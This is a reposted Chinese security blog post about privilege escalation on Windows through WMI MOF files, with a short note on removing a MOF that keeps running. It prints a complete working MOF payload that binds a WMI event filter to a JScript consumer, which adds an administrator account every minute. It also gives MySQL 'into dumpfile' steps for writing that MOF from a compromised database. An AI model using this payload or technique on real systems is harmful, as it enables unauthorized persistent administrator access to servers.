Windows 管理规范 (WMI) 提供了以下三种方法编译到WMI存储库的托管对象格式 (MOF) 文件:
方法 1: 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。
方法2: 使用 IMofCompiler 接口和 $ CompileFile 方法。
方法 3: 拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MOF 文件。
Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mofcomp.exe 文件,
或使用 IMofCompiler::CompileFile 方法。
注意:
第三种方法仅为向后兼容性与早期版本(win2003)的 WMI 提供,
并因为此功能可能不会提供在将来的版本后,不应使用。
鬼哥:
我现在只想知道怎么停止已执行的mof,
昨天测试的时候放了个.mof到
C:\WINDOWS\system32\wbem\mof\
从昨天晚上一直到现在还在每过5秒就执行次加个用户,
搞的我郁闷死了。。。
解决办法:
第一 net stop winmgmt 停止服务,
第二 删除文件夹:C:\WINDOWS\system32\wbem\Repository\
第三 net start winmgmt 启动服务
第四:完毕不会在执行了。
C:\WINDOWS\system32\wbem\Repository\ 放的是储存库 我们执行的.mof都会被加入到这个库了。
然后一直按脚本设置的时间执行。。
删除后 重新启动 会重建个默认储存库 这样我们先前执行mof就没了。
-------------------------------XXX.MOF-----------------------------------------------------------
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
-------------------------------XXX.MOF end-----------------------------------------------------------
最近的MYSQL提权也是利用此法.
1.找个可写目录,上传mof文件
2.执行sql
select load1_file('C:\\RECYCLER\\nullevt.mof') into
dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
转自:http://0x80c.com/file=/var/mof%E6%96%87%E4%BB%B6%E6%8F%90%E6%9D%83
转载请注明:jinglingshu的博客 » MOF文件提权